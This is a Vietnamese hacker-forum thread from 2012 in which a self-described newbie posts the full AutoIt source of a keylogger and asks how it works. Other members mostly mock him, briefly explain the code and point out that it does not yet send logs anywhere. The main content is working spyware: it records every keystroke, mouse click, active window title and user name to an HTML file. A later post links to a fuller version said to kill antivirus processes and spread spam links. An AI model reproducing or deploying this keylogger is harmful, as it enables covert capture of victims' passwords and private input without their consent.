| [Question] Nhờ chuyên gia phân tích code này |
24/06/2012 15:15:35 (+0700) | #1 | 265505 |
![[Avatar]](/hvaonline/images/avatar/98f618be09e5535e8837a1b238a3663a.png "[Avatar]")
|
tdtv-bkt432
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 13/06/2012 02:14:06
Messages: 47
Location: /root/user...../null
Offline
|
|
cái này là keylogger copy trên web kia.không hiểu rõ về nó nên nhờ chuyên gia.ai phân tích giùm hoạt động của nó ra sao
Code:
#Include-Once
#Include <misc.au3>
Global $sLast = ""
$WindowCheck = ""
$Date=@mon&@mday&@year&"_"&@hour&@min&@sec
$FileOpen = FileOpen($Date&".html", 1)
$User = " CurrentUser:{"&"<i>"&@UserName&"</i>"&"}"
Func _LogKeyPressed($WhatToLog)
$WindowTitle = WinGetTitle("")
$Date = " Date:{"&"<i>"&@mon&"-"&@mday&"-"&@year&"</i>"&"}"
$Time = " Time:{"&"<i>"&@hour&":"&@min&"."&@sec&"."&@msec&"</i>"&"}"
If $WindowTitle = $WindowCheck Then
FileWrite($FileOpen, $WhatToLog)
Else
$WindowCheck = $WindowTitle
FileWrite($FileOpen, "<table border="&""""&"2"&""""&"><tr><th>WindowTitle:"&"["&"<i>"&$WindowTitle&"</i>"&"]"&$User&$Date&$Time&"</th>"&"</tr></table>")
EndIf
EndFunc
Func _CaptureKeys()
If _IsPressed('01') Then
If $sLast <> "01" Then _LogKeyPressed('<font ><b> {<u>LEFT MOUSE BUTTON</u>} </b></font>')
$sLast = "01"
EndIf
If _IsPressed('02') Then
If $sLast <> "02" Then _LogKeyPressed('<font ><b> {<u>RIGHT MOUSE BUTTON</u>} </b></font>')
$sLast = "02"
EndIf
If _IsPressed('04') Then
If $sLast <> "04" Then _LogKeyPressed('<font ><b> {<u>MIDDLE MOUSE BUTTON</u>} </b></font>')
$sLast = "04"
EndIf
If _IsPressed('05') Then
If $sLast <> "05" Then _LogKeyPressed('<font ><b> {<u>2000/XP X1 MouseButton</u>} </b></font>')
$sLast = "05"
EndIf
If _IsPressed('06') Then
If $sLast <> "06" Then _LogKeyPressed('<font ><b> {<u>2000/XP X2 MouseButton</u>} </b></font>')
$sLast = "06"
EndIf
If _IsPressed('08') Then
If $sLast <> "08" Then _LogKeyPressed('<font ><b> {<u>BACKSPACE</u>} </b></font>')
$sLast = "08"
EndIf
If _IsPressed('09') Then
If $sLast <> "09" Then _LogKeyPressed('<font ><b> {<u>TAB</u>} </b></font>')
$sLast = "09"
EndIf
If _IsPressed('0C') Then
If $sLast <> "0C" Then _LogKeyPressed('<font ><b> {<u>CLEAR</u>} </b></font>')
$sLast = "0C"
EndIf
If _IsPressed('0D') Then
If $sLast <> "0D" Then _LogKeyPressed('<br><font ><b> {<u>ENTER</u>} </b></font><br>')
$sLast = "0D"
EndIf
If _IsPressed('10') Then
If $sLast <> "10" Then _LogKeyPressed('<font ><b> {<u>SHIFT</u>} </b></font>')
$sLast = "10"
EndIf
If _IsPressed('11') Then
If $sLast <> "11" Then _LogKeyPressed('<font ><b> {<u>CTRL</u>} </b></font>')
$sLast = "11"
EndIf
If _IsPressed('12') Then
If $sLast <> "12" Then _LogKeyPressed('<font ><b> {<u>ALT</u>} </b></font>')
$sLast = "12"
EndIf
If _IsPressed('13') Then
If $sLast <> "13" Then _LogKeyPressed('<font ><b> {<u>PAUSE</u>} </b></font>')
$sLast = "13"
EndIf
If _IsPressed('14') Then
If $sLast <> "14" Then _LogKeyPressed('<font ><b> {<u>CAPS</u>} </b></font>')
$sLast = "14"
EndIf
If _IsPressed('1B') Then
If $sLast <> "1B" Then _LogKeyPressed('<font ><b> {<u>ESC</u>} </b></font>')
$sLast = "1B"
EndIf
If _IsPressed('20') Then
If $sLast <> "20" Then _LogKeyPressed(' ')
$sLast = "20"
EndIf
If _IsPressed('21') Then
If $sLast <> "21" Then _LogKeyPressed('<font ><b> {<u>PAGEUP</u>} </b></font>')
$sLast = "21"
EndIf
If _IsPressed('22') Then
If $sLast <> "22" Then _LogKeyPressed('<font ><b> {<u>PAGEDOWN</u>} </b></font>')
$sLast = "22"
EndIf
If _IsPressed('23') Then
If $sLast <> "23" Then _LogKeyPressed('<font ><b> {<u>END</u>} </b></font>')
$sLast = "23"
EndIf
If _IsPressed('24') Then
If $sLast <> "24" Then _LogKeyPressed('<font ><b> {<u>HOME</u>} </b></font>')
$sLast = "24"
EndIf
If _IsPressed('25') Then
If $sLast <> "25" Then _LogKeyPressed('<font ><b> {<u>LEFTARROW</u>} </b></font>')
$sLast = "25"
EndIf
If _IsPressed('26') Then
If $sLast <> "26" Then _LogKeyPressed('<font ><b> {<u>UPARROW</u>} </b></font>')
$sLast = "26"
EndIf
If _IsPressed('27') Then
If $sLast <> "27" Then _LogKeyPressed('<font ><b> {<u>RIGHTARROW</u>} </b></font>')
$sLast = "27"
EndIf
If _IsPressed('28') Then
If $sLast <> "28" Then _LogKeyPressed('<font ><b> {<u>DOWNARROW</u>} </b></font>')
$sLast = "28"
EndIf
If _IsPressed('29') Then
If $sLast <> "29" Then _LogKeyPressed('<font ><b> {<u>SELECT</u>} </b></font>')
$sLast = "29"
EndIf
If _IsPressed('2A') Then
If $sLast <> "2A" Then _LogKeyPressed('<font ><b> {<u>PRINT</u>} </b></font>')
$sLast = "2A"
EndIf
If _IsPressed('2B') Then
If $sLast <> "2B" Then _LogKeyPressed('<font ><b> {<u>EXECUTE</u>} </b></font>')
$sLast = "2B"
EndIf
If _IsPressed('2C') Then
If $sLast <> "2C" Then _LogKeyPressed('<font ><b> {<u>PRINTSCREEN</u>} </b></font>')
$sLast = "2C"
EndIf
If _IsPressed('2D') Then
If $sLast <> "2D" Then _LogKeyPressed('<font ><b> {<u>INS</u>} </b></font>')
$sLast = "2D"
EndIf
If _IsPressed('2E') Then
If $sLast <> "2E" Then _LogKeyPressed('<font ><b> {<u>DEL</u>} </b></font>')
$sLast = "2E"
EndIf
If _IsPressed('5B') Then
If $sLast <> "5B" Then _LogKeyPressed('<font ><b> {<u>LEFTWINDOW</u>} </b></font>')
$sLast = "5B"
EndIf
If _IsPressed('5C') Then
If $sLast <> "5C" Then _LogKeyPressed('<font ><b> {<u>RIGHTWINDOW</u>} </b></font>')
$sLast = "5C"
EndIf
If _IsPressed('60') Then
If $sLast <> "60" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 0</u>} </b></font>')
$sLast = "60"
EndIf
If _IsPressed('61') Then
If $sLast <> "61" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 1</u>} </b></font>')
$sLast = "61"
EndIf
If _IsPressed('62') Then
If $sLast <> "62" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 2</u>} </b></font>')
$sLast = "62"
EndIf
If _IsPressed('63') Then
If $sLast <> "63" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 3</u>} </b></font>')
$sLast = "63"
EndIf
If _IsPressed('64') Then
If $sLast <> "64" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 4</u>} </b></font>')
$sLast = "64"
EndIf
If _IsPressed('65') Then
If $sLast <> "65" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 5</u>} </b></font>')
$sLast = "65"
EndIf
If _IsPressed('66') Then
If $sLast <> "66" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 6</u>} </b></font>')
$sLast = "66"
EndIf
If _IsPressed('67') Then
If $sLast <> "67" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 7</u>} </b></font>')
$sLast = "67"
EndIf
If _IsPressed('68') Then
If $sLast <> "68" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 8</u>} </b></font>')
$sLast = "68"
EndIf
If _IsPressed('69') Then
If $sLast <> "69" Then _LogKeyPressed('<font ><b> {<u>NUMKEYPAD 9</u>} </b></font>')
$sLast = "69"
EndIf
If _IsPressed('6A') Then
If $sLast <> "6A" Then _LogKeyPressed('<font ><b> {<u>MULTIPLY</u>} </b></font>')
$sLast = "6A"
EndIf
If _IsPressed('6B') Then
If $sLast <> "6B" Then _LogKeyPressed('<font ><b> {<u>ADD</u>} </b></font>')
$sLast = "6B"
EndIf
If _IsPressed('6C') Then
If $sLast <> "6C" Then _LogKeyPressed('<font ><b> {<u>SEPARATOR</u>} </b></font>')
$sLast = "6C"
EndIf
If _IsPressed('6D') Then
If $sLast <> "6D" Then _LogKeyPressed('<font ><b> {<u>SUBTRACT</u>} </b></font>')
$sLast = "6D"
EndIf
If _IsPressed('6E') Then
If $sLast <> "6E" Then _LogKeyPressed('<font ><b> {<u>DECIMAL</u>} </b></font>')
$sLast = "6E"
EndIf
If _IsPressed('6F') Then
If $sLast <> "6F" Then _LogKeyPressed('<font ><b> {<u>DIVIDE</u>} </b></font>')
$sLast = "6F"
EndIf
If _IsPressed('70') Then
If $sLast <> "70" Then _LogKeyPressed('<font ><b> {F1} </b></font>')
$sLast = "70"
EndIf
If _IsPressed('71') Then
If $sLast <> "71" Then _LogKeyPressed('<font ><b> {F2} </b></font>')
$sLast = "71"
EndIf
If _IsPressed('72') Then
If $sLast <> "72" Then _LogKeyPressed('<font ><b> {F3} </b></font>')
$sLast = "72"
EndIf
If _IsPressed('73') Then
If $sLast <> "73" Then _LogKeyPressed('<font ><b> {F4} </b></font>')
$sLast = "73"
EndIf
If _IsPressed('74') Then
If $sLast <> "74" Then _LogKeyPressed('<font ><b> {F5} </b></font>')
$sLast = "74"
EndIf
If _IsPressed('75') Then
If $sLast <> "75" Then _LogKeyPressed('<font ><b> {F6} </b></font>')
$sLast = "75"
EndIf
If _IsPressed('76') Then
If $sLast <> "76" Then _LogKeyPressed('<font ><b> {F7} </b></font>')
$sLast = "76"
EndIf
If _IsPressed('77') Then
If $sLast <> "77" Then _LogKeyPressed('<font ><b> {F8} </b></font>')
$sLast = "77"
EndIf
If _IsPressed('78') Then
If $sLast <> "78" Then _LogKeyPressed('<font ><b> {F9} </b></font>')
$sLast = "78"
EndIf
If _IsPressed('79') Then
If $sLast <> "79" Then _LogKeyPressed('<font ><b> {F10} </b></font>')
$sLast = "79"
EndIf
If _IsPressed('7A') Then
If $sLast <> "7A" Then _LogKeyPressed('<font ><b> {F11} </b></font>')
$sLast = "7A"
EndIf
If _IsPressed('7B') Then
If $sLast <> "7B" Then _LogKeyPressed('<font ><b> {F12} </b></font>')
$sLast = "7B"
EndIf
If _IsPressed('7C') Then
If $sLast <> "7C" Then _LogKeyPressed('<font ><b> {F13} </b></font>')
$sLast = "7C"
EndIf
If _IsPressed('7D') Then
If $sLast <> "7D" Then _LogKeyPressed('<font ><b> {F14} </b></font>')
$sLast = "7D"
EndIf
If _IsPressed('7E') Then
If $sLast <> "7E" Then _LogKeyPressed('<font ><b> {F15} </b></font>')
$sLast = "7E"
EndIf
If _IsPressed('7F') Then
If $sLast <> "7F" Then _LogKeyPressed('<font ><b> {F16} </b></font>')
$sLast = "7F"
EndIf
If _IsPressed('80H') Then
If $sLast <> "80H" Then _LogKeyPressed('<font ><b> {F17} </b></font>')
$sLast = "80H"
EndIf
If _IsPressed('81H') Then
If $sLast <> "81H" Then _LogKeyPressed('<font ><b> {F18} </b></font>')
$sLast = "81H"
EndIf
If _IsPressed('82H') Then
If $sLast <> "82H" Then _LogKeyPressed('<font ><b> {F19} </b></font>')
$sLast = "82H"
EndIf
If _IsPressed('83H') Then
If $sLast <> "83H" Then _LogKeyPressed('<font ><b> {F20} </b></font>')
$sLast = "83H"
EndIf
If _IsPressed('84H') Then
If $sLast <> "84H" Then _LogKeyPressed('<font ><b> {F21} </b></font>')
$sLast = "84H"
EndIf
If _IsPressed('85H') Then
If $sLast <> "85H" Then _LogKeyPressed('<font ><b> {F22} </b></font>')
$sLast = "85H"
EndIf
If _IsPressed('86H') Then
If $sLast <> "86H" Then _LogKeyPressed('<font ><b> {F23} </b></font>')
$sLast = "86H"
EndIf
If _IsPressed('87H') Then
If $sLast <> "87H" Then _LogKeyPressed('<font ><b> {F24} </b></font>')
$sLast = "87H"
EndIf
If _IsPressed('90') Then
If $sLast <> "90" Then _LogKeyPressed('<font ><b> {<u>NUMLOCK</u>} </b></font>')
$sLast = "90"
EndIf
If _IsPressed('91') Then
If $sLast <> "91" Then _LogKeyPressed('<font ><b> {<u>SCROLLLOCK</u>} </b></font>')
$sLast = "91"
EndIf
If _IsPressed('A1') Then
If $sLast <> "A1" Then _LogKeyPressed('<font ><b> {<u>RIGHTSHIFT</u>} </b></font>')
$sLast = "A1"
EndIf
If _IsPressed('A2') Then
If $sLast <> "A2" Then _LogKeyPressed('<font ><b> {<u>LEFTCONTROL</u>} </b></font>')
$sLast = "A2"
EndIf
If _IsPressed('A3') Then
If $sLast <> "A3" Then _LogKeyPressed('<font ><b> {<u>RIGHTCONTROL</u>} </b></font>')
$sLast = "A3"
EndIf
If _IsPressed('A4') Then
If $sLast <> "A4" Then _LogKeyPressed('<font ><b> {<u>LEFTMENU</u>} </b></font>')
$sLast = "A4"
EndIf
If _IsPressed('A5') Then
If $sLast <> "A5" Then _LogKeyPressed('<font ><b> {<u>RIGHTMENU</u>} </b></font>')
$sLast = "A5"
EndIf
If _IsPressed('30') Then
If $sLast <> "30" Then _LogKeyPressed('0')
$sLast = "30"
EndIf
If _IsPressed('31') Then
If $sLast <> "31" Then _LogKeyPressed('1')
$sLast = "31"
EndIf
If _IsPressed('32') Then
If $sLast <> "32" Then _LogKeyPressed('2')
$sLast = "32"
EndIf
If _IsPressed('33') Then
If $sLast <> "33" Then _LogKeyPressed('3')
$sLast = "33"
EndIf
If _IsPressed('34') Then
If $sLast <> "34" Then _LogKeyPressed('4')
$sLast = "34"
EndIf
If _IsPressed('35') Then
If $sLast <> "35" Then _LogKeyPressed('5')
$sLast = "35"
EndIf
If _IsPressed('36') Then
If $sLast <> "36" Then _LogKeyPressed('6')
$sLast = "36"
EndIf
If _IsPressed('37') Then
If $sLast <> "37" Then _LogKeyPressed('7')
$sLast = "37"
EndIf
If _IsPressed('38') Then
If $sLast <> "38" Then _LogKeyPressed('8')
$sLast = "38"
EndIf
If _IsPressed('39') Then
If $sLast <> "39" Then _LogKeyPressed('9')
$sLast = "39"
EndIf
If _IsPressed('41') Then
If $sLast <> "41" Then _LogKeyPressed('A')
$sLast = "41"
EndIf
If _IsPressed('42') Then
If $sLast <> "42" Then _LogKeyPressed('B')
$sLast = "42"
EndIf
If _IsPressed('43') Then
If $sLast <> "43" Then _LogKeyPressed('C')
$sLast = "43"
EndIf
If _IsPressed('44') Then
If $sLast <> "44" Then _LogKeyPressed('D')
$sLast = "44"
EndIf
If _IsPressed('45') Then
If $sLast <> "45" Then _LogKeyPressed('E')
$sLast = "45"
EndIf
If _IsPressed('46') Then
If $sLast <> "46" Then _LogKeyPressed('F')
$sLast = "46"
EndIf
If _IsPressed('47') Then
If $sLast <> "47" Then _LogKeyPressed('G')
$sLast = "47"
EndIf
If _IsPressed('48') Then
If $sLast <> "48" Then _LogKeyPressed('H')
$sLast = "48"
EndIf
If _IsPressed('49') Then
If $sLast <> "49" Then _LogKeyPressed('I')
$sLast = "49"
EndIf
If _IsPressed('4A') Then
If $sLast <> "4A" Then _LogKeyPressed('J')
$sLast = "4A"
EndIf
If _IsPressed('4B') Then
If $sLast <> "4B" Then _LogKeyPressed('K')
$sLast = "4B"
EndIf
If _IsPressed('4C') Then
If $sLast <> "4C" Then _LogKeyPressed('L')
$sLast = "4C"
EndIf
If _IsPressed('4D') Then
If $sLast <> "4D" Then _LogKeyPressed('M')
$sLast = "4D"
EndIf
If _IsPressed('4E') Then
If $sLast <> "4E" Then _LogKeyPressed('N')
$sLast = "4E"
EndIf
If _IsPressed('4F') Then
If $sLast <> "4F" Then _LogKeyPressed('O')
$sLast = "4F"
EndIf
If _IsPressed('50') Then
If $sLast <> "50" Then _LogKeyPressed('P')
$sLast = "50"
EndIf
If _IsPressed('51') Then
If $sLast <> "51" Then _LogKeyPressed('Q')
$sLast = "51"
EndIf
If _IsPressed('52') Then
If $sLast <> "52" Then _LogKeyPressed('R')
$sLast = "52"
EndIf
If _IsPressed('53') Then
If $sLast <> "53" Then _LogKeyPressed('S')
$sLast = "53"
EndIf
If _IsPressed('54') Then
If $sLast <> "54" Then _LogKeyPressed('T')
$sLast = "54"
EndIf
If _IsPressed('55') Then
If $sLast <> "55" Then _LogKeyPressed('U')
$sLast = "55"
EndIf
If _IsPressed('56') Then
If $sLast <> "56" Then _LogKeyPressed('V')
$sLast = "56"
EndIf
If _IsPressed('57') Then
If $sLast <> "57" Then _LogKeyPressed('W')
$sLast = "57"
EndIf
If _IsPressed('58') Then
If $sLast <> "58" Then _LogKeyPressed('X')
$sLast = "58"
EndIf
If _IsPressed('59') Then
If $sLast <> "59" Then _LogKeyPressed('Y')
$sLast = "59"
EndIf
If _IsPressed('5A') Then
If $sLast <> "5A" Then _LogKeyPressed('Z')
$sLast = "5A"
EndIf
If _IsPressed('BA') Then
If $sLast <> "BA" Then _LogKeyPressed(';')
$sLast = "BA"
EndIf
If _IsPressed('BB') Then
If $sLast <> "BB" Then _LogKeyPressed('=')
$sLast = "BB"
EndIf
If _IsPressed('BC') Then
If $sLast <> "BC" Then _LogKeyPressed(',')
$sLast = "BC"
EndIf
If _IsPressed('BD') Then
If $sLast <> "BD" Then _LogKeyPressed('-')
$sLast = "BD"
EndIf
If _IsPressed('BE') Then
If $sLast <> "BE" Then _LogKeyPressed('.')
$sLast = "BE"
EndIf
If _IsPressed('BF') Then
If $sLast <> "BF" Then _LogKeyPressed('/')
$sLast = "BF"
EndIf
If _IsPressed('C0') Then
If $sLast <> "C0" Then _LogKeyPressed('`')
$sLast = "C0"
EndIf
If _IsPressed('DB') Then
If $sLast <> "DB" Then _LogKeyPressed('[')
$sLast = "DB"
EndIf
If _IsPressed('DC') Then
If $sLast <> "DC" Then _LogKeyPressed('\')
$sLast = "DC"
EndIf
If _IsPressed('DD') Then
If $sLast <> "DD" Then _LogKeyPressed(']')
$sLast = "DD"
EndIf
Sleep(75)
EndFunc
|
|
|
 |
|
| [Question] Nhờ chuyên gia phân tích code này |
24/06/2012 15:18:22 (+0700) | #2 | 265506 |
![[Avatar]](/hvaonline/images/avatar/3099a4ec6dc1da1e77c1b4070c7aa9b8.jpg "[Avatar]")
|
bolzano_1989
Journalist
|
|
0 |
|
|
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
|
|
Không có chuyên gia nào dọn sẵn cho bạn đâu.
AutoIt
http://www.autoitscript.com/autoit3/docs/
|
|
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY |
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
24/06/2012 15:37:53 (+0700) | #3 | 265508 |
|
tdtv-bkt432
Member
|
|
0 |
|
|
Joined: 13/06/2012 02:14:06
Messages: 47
Location: /root/user...../null
Offline
|
|
   nhờ phân tích hoạt đọng thôi làm gì mà ghê vậy.diễn đàn hacker gì mà..... |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
24/06/2012 16:56:04 (+0700) | #4 | 265511 |
TQN
Elite Member
|
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Code rành rành, rõ ràng như ban ngày vậy mà còn đòi phân tích cái gì nữa trời !
|
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
24/06/2012 18:21:39 (+0700) | #5 | 265515 |
|
tdtv-bkt432
Member
|
|
0 |
|
|
Joined: 13/06/2012 02:14:06
Messages: 47
Location: /root/user...../null
Offline
|
|
không hiểu rõ hoạt động.newbie mà  |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
24/06/2012 18:50:44 (+0700) | #6 | 265517 |
![[Avatar]](/hvaonline/images/avatar/61701c46e652bbfcb74aaeb1ae6b88e2.jpg "[Avatar]")
|
sasser01052004
Member
|
|
0 |
|
|
Joined: 20/09/2010 01:27:29
Messages: 150
Location: /home/sasser
Offline
|
|
Lại dân script kiddie khoái làm hắc cờ
Sao bạn cứ dòm vào cái AutoIt thế
Nguyên cái MSG nó đã gần mb rồi
Cái code trên khá đơn giản.
Dòng đầu là chỉ thị tiền biên dịch (bao hàm tiệp tin)
Các dòng sau là phần thân chương trình
Cái hàm Capture để bắt phím khi có sự kiện keypressed
|
|
| Ask me why, don't ask me what. |
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
24/06/2012 23:16:21 (+0700) | #7 | 265524 |
![[Avatar]](/hvaonline/images/avatar/ee57e7e13a1e4820f716d2bca44f4ed9.png "[Avatar]")
|
Ky0
Moderator
|
Joined: 16/08/2009 23:09:08
Messages: 532
Offline
|
|
|
|
UITNetwork.com
Let's Connect |
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 08:01:04 (+0700) | #8 | 265536 |
|
tdtv-bkt432
Member
|
|
0 |
|
|
Joined: 13/06/2012 02:14:06
Messages: 47
Location: /root/user...../null
Offline
|
|
| CÁI NÀY NOC CÓ GỬI KQ VỀ CHO MÌNH KHÔNG? |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 08:03:27 (+0700) | #9 | 265537 |
|
tdtv-bkt432
Member
|
|
0 |
|
|
Joined: 13/06/2012 02:14:06
Messages: 47
Location: /root/user...../null
Offline
|
|
| chỉ cần 10 phần giống nhau=> chỉ 1 chỗ========>hiểu hết |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 08:42:02 (+0700) | #10 | 265538 |
|
sasser01052004
Member
|
|
0 |
|
|
Joined: 20/09/2010 01:27:29
Messages: 150
Location: /home/sasser
Offline
|
|
@tdtv-bkt432 bạn còn đi học hay đã đi làm rồi
CÁI NÀY NOC CÓ GỬI KQ VỀ CHO MÌNH KHÔNG?
Em tớ hỏi cái file misc.au3 chứa cái gì, bạn post cho nó xem chút |
|
| Ask me why, don't ask me what. |
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 09:35:27 (+0700) | #11 | 265545 |
|
tdtv-bkt432
Member
|
|
0 |
|
|
Joined: 13/06/2012 02:14:06
Messages: 47
Location: /root/user...../null
Offline
|
|
sasser01052004 wrote:
@tdtv-bkt432 bạn còn đi học hay đã đi làm rồi
Đang còn Đi Học
CÁI NÀY NOC CÓ GỬI KQ VỀ CHO MÌNH KHÔNG?
Em tớ hỏi cái file misc.au3 chứa cái gì, bạn post cho nó xem chút
mình copy code mà.mình sửa thành file của mình rồi
|
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 09:37:58 (+0700) | #12 | 265546 |
|
tdtv-bkt432
Member
|
|
0 |
|
|
Joined: 13/06/2012 02:14:06
Messages: 47
Location: /root/user...../null
Offline
|
|
thích file thì có đây. không dịch ngược được đâu mà cố gắng
http://www.mediafire.com/?soojssnydft9f54 |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 09:43:35 (+0700) | #13 | 265549 |
![[Avatar]](/hvaonline/images/avatar/da23de5810e335573c5e0905de70b461.png "[Avatar]")
|
chiro8x
Member
|
|
0 |
|
|
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
|
|
tdtv-bkt432 wrote:
không hiểu rõ hoạt động.newbie mà
Tớ nghĩ là noob chứ không phải newbie, vì newbie cầu tiến hơn thế. |
|
| while(1){} |
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 09:44:00 (+0700) | #14 | 265550 |
n2tforever
Member
|
|
0 |
|
|
Joined: 01/07/2011 15:39:51
Messages: 92
Offline
|
|
tdtv-bkt432 wrote:
thích file thì có đây. không dịch ngược được đâu mà cố gắng
http://www.mediafire.com/?soojssnydft9f54
chết cười copy code mà không hiểu nó làm gì thì thì thể hiện với ai ? cái đoạn code bên trên chưa phải là thân chương trình nó mới chỉ khai báo hai hàm để ghi log và capture key thôi không gửi cái file include kia lên mà đòi nhờ phân tích cái nỗi gì  |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 09:57:37 (+0700) | #15 | 265552 |
nguyenga86
Member
|
|
0 |
|
|
Joined: 13/11/2010 00:19:05
Messages: 205
Offline
|
|
cái misc.au3 nó là thư viện có sẵn mà , cài autoit ra là có , vô đó trực tiếp coi code có cái gì mà phải dịch ngược trời ... từ hồi sinh hoạt trên HVA tớ đã không còn ảo tưởng cái gì gọi là virus bằng autoit rồi , thích autoit vì nó tiện và dễ hiểu , phù hợp với nhu cầu đơn giản của mình thôi , những sản phẩm đầu tay của tớ cũng làm từ autoit đấy ... có lẽ mấy cao thủ ở đây ko thich autoit vì mấy bạn cứ thích dùng autoit viết virus , tội lỗi tội lỗi ....  |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 09:59:38 (+0700) | #16 | 265553 |
|
chiro8x
Member
|
|
0 |
|
|
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
|
|
Code:
<font ><b> {F2} </b></font>
Sao không viết thế này:
Code:
<style>
body{
font-weight:bold;
}
</style>
Chèn vào <head></head>
Code:
<font ><b> {F2} </b></font> <=> <b> {F2} </b>
Noob! |
|
| while(1){} |
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 10:02:27 (+0700) | #17 | 265554 |
nobita1610
Member
|
|
0 |
|
|
Joined: 07/07/2011 04:16:04
Messages: 6
Offline
|
|
code trên chỉ thấy nó ghi lại sự kiện ấn phìm rồi ghi vào File
chưa thấy nó load lên host hoặc send qua mail nhỉ
chắc tác giả còn thiếu |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 10:06:29 (+0700) | #18 | 265555 |
nguyenga86
Member
|
|
0 |
|
|
Joined: 13/11/2010 00:19:05
Messages: 205
Offline
|
|
| code này đã đầy đủ đâu , viết đầy đủ ra xong compile chắc phải lên đến cả Mb ấy chứ |
|
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
25/06/2012 21:20:50 (+0700) | #19 | 265584 |
![[Avatar]](/hvaonline/images/avatar/1e4eba502e47f5317a37883c1acd639d.jpg "[Avatar]")
|
quygia128
Member
|
|
0 |
|
|
Joined: 15/07/2009 20:50:28
Messages: 119
Location: Somewhere
Offline
|
|
Muốn đầy đủ thì ở đây nè
http://www.mediafire.com/?ej550j7245qp54m
Pass: HVA
Mấy thằng viết cái này cũng rảnh thiệt. |
|
.::Mới bắt đầu trên con đường dài::.
.::Super Newbiez::. |
|
|
|
| [Question] Nhờ chuyên gia phân tích code này |
26/06/2012 08:15:05 (+0700) | #20 | 265598 |
nguyenga86
Member
|
|
0 |
|
|
Joined: 13/11/2010 00:19:05
Messages: 205
Offline
|
|
| nản cái cách nó đòi close process mấy cái AV ... , trong cái code này có cả spam yahoo nữa , mà spam cái link lù lù như vậy chắc chỉ có thằng ngu nó mới click vô ... sorry những ai trót dại click vô mấy cái kiểu đó trên yahoo |
|
|
| [Question] Nhờ chuyên gia phân tích code này |
26/06/2012 13:30:19 (+0700) | #21 | 265608 |
|
sasser01052004
Member
|
|
0 |
|
|
Joined: 20/09/2010 01:27:29
Messages: 150
Location: /home/sasser
Offline
|
|
em tớ đã xem qua, nó phán câu là nhảm quá
Tớ: @chiro8x: cái này không phải gọi là noob mà gọi là script kiddie (kịch bản của tụi trẻ con)
|
|
| Ask me why, don't ask me what. |
|
| Users currently in here |
|
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận virus, trojan, spyware, worm...
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[WWW]](/hvaonline/templates/viet/images/icon_www.gif "[www]"){kind=icon}
![[Yahoo!]](/hvaonline/templates/viet/images/icon_yim.gif "[YIM]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
